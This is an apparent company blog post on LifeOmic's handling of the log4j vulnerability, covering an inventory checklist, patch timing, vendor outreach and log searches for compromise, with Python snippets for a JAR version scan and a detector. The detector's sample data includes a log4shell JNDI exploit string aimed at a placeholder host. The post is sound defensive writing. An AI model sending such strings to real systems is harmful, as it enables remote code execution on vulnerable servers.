How LifeOmic responded to the log4j critical vulnerability

Posted December 15, 2021 by Bishop Bettini ‐ 3 min read

LifeOmic had limited use of the affected software, none of our use was Internet-accessible, and based on all evidence from our extensive logs, LifeOmic was not compromised by the log4j vulnerability. We were aware of the issue within 12 hours of its public disclosure and had mitigated the small number of internal systems affected within 4 hours. We continue to monitor possible impact from vendors who rely on the affected software. For more information, email security@lifeomic.com.

Updates since first publication

- We continue to monitor for new log4j releases and patch as soon as they are published. To date, we’ve patched to versions 2.16 and 2.17.

- We’ve reached out to fifty of our vendors and partners on their log4j remediation status.

- We’ve updated our WAF to block requests attempting to exploit the log4j vulnerability.

Original article

At 8:47am Eastern on December 10, 2021, we were alerted to CVE-2021-44228, a gaping vulnerability in the widely used log4j Java logging framework. This vulnerability has a CVSS score of 10.0, the maximum possible. In cybersecurity terms, it doesn’t get worse than this.

But this was just another day for us. When a vulnerability comes across our threat feeds, we run through a simple check-list:

- does our software directly depend upon the vulnerable component?

- do any internal systems depend on the vulnerable component?

- to what extent do we rely on vendors that use the vulnerable component?

- are we seeing evidence of exploit or compromise in our systems?

Plugging Holes

The key here is inventory: you have to know what your systems contain to know if you’re affected, and this can be “the hardest question that every company has to answer in this particular case”.

After engaging our team leads, we identified 11 components (items #1 and #2 on our check-list) that used a vulnerable version of log4j. None of those components were Internet-facing, and none logged user-supplied values through log4j, the required vector of attack. By 12:52pm Eastern (T+4h5m), all affected systems had been patched to the then-recommended log4j version, 2.15.0, and redeployed.
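The inventory step can be sketched in a few lines of Python. This is a minimal illustration, not the tooling we used: it assumes JAR files follow the usual Maven naming (for example `log4j-core-2.14.1.jar`), and the names `parse_version`, `needs_patch`, and `find_outdated_jars` are hypothetical. It only inspects file names, so it would miss copies of log4j bundled inside other archives.

```python
import re
from pathlib import Path

# Assumption: JARs use the usual Maven naming, e.g. log4j-core-2.14.1.jar.
JAR_PATTERN = re.compile(r"^log4j-core-(\d+)\.(\d+)(?:\.(\d+))?.*\.jar$")

# The then-recommended version named in this post.
FIXED_VERSION = (2, 15, 0)


def parse_version(jar_name):
    """Return (major, minor, patch) for a log4j-core JAR name, else None."""
    match = JAR_PATTERN.match(jar_name)
    if match is None:
        return None
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def needs_patch(jar_name, fixed=FIXED_VERSION):
    """True when the JAR is a log4j-core release older than `fixed`."""
    version = parse_version(jar_name)
    return version is not None and version < fixed


def find_outdated_jars(root):
    """Walk `root` and list log4j-core JARs older than FIXED_VERSION."""
    return sorted(
        str(path)
        for path in Path(root).rglob("log4j-core-*.jar")
        if needs_patch(path.name)
    )
```

Calling `find_outdated_jars` on a deployment directory returns the paths that still need attention; an empty list means no outdated file names were found under that root, which is weaker than proving the system is unaffected.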

While patching was underway, we began researching how our vendors were responding (#3 on our check-list) and whether their systems were also vulnerable. Most had not yet begun to release any details, and many still haven’t. That’s expected in a major event like this, so we continue engaging with our vendors to assess potential impacts. For example, we follow Amazon Web Services updates closely, applying patches as soon as they’re available, because we rely on many AWS services to deliver our platform.

Indicators of Compromise

Inventory assessment and remediation is the first part of the work. The second is scouring our logs for indicators of compromise (#4 on our check-list). We use an industry-standard SIEM and keep logs hot for 180 days, so we had plenty of history to search through.
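As a rough illustration of what such a search looks for, the sketch below flags log lines containing the `${jndi:` lookup prefix used in exploit attempts for this vulnerability. It is not our SIEM query: the function name `find_suspect_lines` and the sample lines are hypothetical, and the pattern deliberately stays simple, so it will not catch obfuscated variants that build the string from nested lookups.

```python
import re
from urllib.parse import unquote

# The lookup prefix seen in exploit attempts, matched case-insensitively.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


def find_suspect_lines(lines):
    """Return (line_number, line) pairs whose decoded text contains ${jndi:."""
    hits = []
    for number, line in enumerate(lines, start=1):
        # Percent-decode first so URL-encoded payloads are also matched.
        if JNDI_PATTERN.search(unquote(line)):
            hits.append((number, line))
    return hits


# Hypothetical sample lines, for illustration only.
sample = [
    'GET / HTTP/1.1 "Mozilla/5.0"',
    'GET / HTTP/1.1 "${jndi:ldap://example.invalid/a}"',
    "GET /?q=%24%7BJNDI%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1",
]

for number, line in find_suspect_lines(sample):
    print(number, line)
```

A match only shows that someone attempted the exploit. Whether a system was compromised depends on whether the string reached a vulnerable log4j instance, which is why the inventory step comes first.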

Based on our investigation to date, we do not believe we’ve been compromised. We will of course continue to monitor.



The first indication of a scan attempt was at 9:09pm Eastern the day before (T-11h38m), and most of the early attempts originated from behind “The Great Firewall” in China:



It’s been interesting to watch the evolution of the attack. To date, we’ve logged 641,089 attempts that fit the model of this vulnerability, but the vast majority now originate in Ireland.

Next steps

We continue to monitor for indicators of compromise and engage with our vendors to understand their impact on us. As new relevant information becomes known, we’ll update this blog post.

As always, the LifeOmic Security Team will use this vulnerability investigation to test our internal procedures and make improvements where needed, including to our third-party risk and vendor management program.

Media

This blog post contains data points pulled from our incident response timeline. Keeping a record of who did what and when is a crucial forensic step that also allows for retrospective discussions: what could we do better next time? Every incident we handle has an associated timeline.
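The T+ and T- offsets quoted in this post are relative to the moment we were alerted. A minimal sketch of that arithmetic, assuming all timestamps are in Eastern time and using a hypothetical helper named `format_offset`:

```python
from datetime import datetime

# T0: when we were alerted to the CVE (Eastern time, from this post).
ALERTED = datetime(2021, 12, 10, 8, 47)


def format_offset(event, t0=ALERTED):
    """Format the gap between `event` and `t0` as T+XhYm or T-XhYm."""
    total_minutes = int((event - t0).total_seconds() // 60)
    sign = "+" if total_minutes >= 0 else "-"
    hours, minutes = divmod(abs(total_minutes), 60)
    return f"T{sign}{hours}h{minutes}m"


# Timestamps taken from this post.
timeline = {
    "first scan attempt": datetime(2021, 12, 9, 21, 9),
    "all affected systems patched": datetime(2021, 12, 10, 12, 52),
}

for label, when in timeline.items():
    print(f"{format_offset(when)}  {label}")
```

This prints `T-11h38m` for the first scan attempt and `T+4h5m` for the completed patching, matching the figures above.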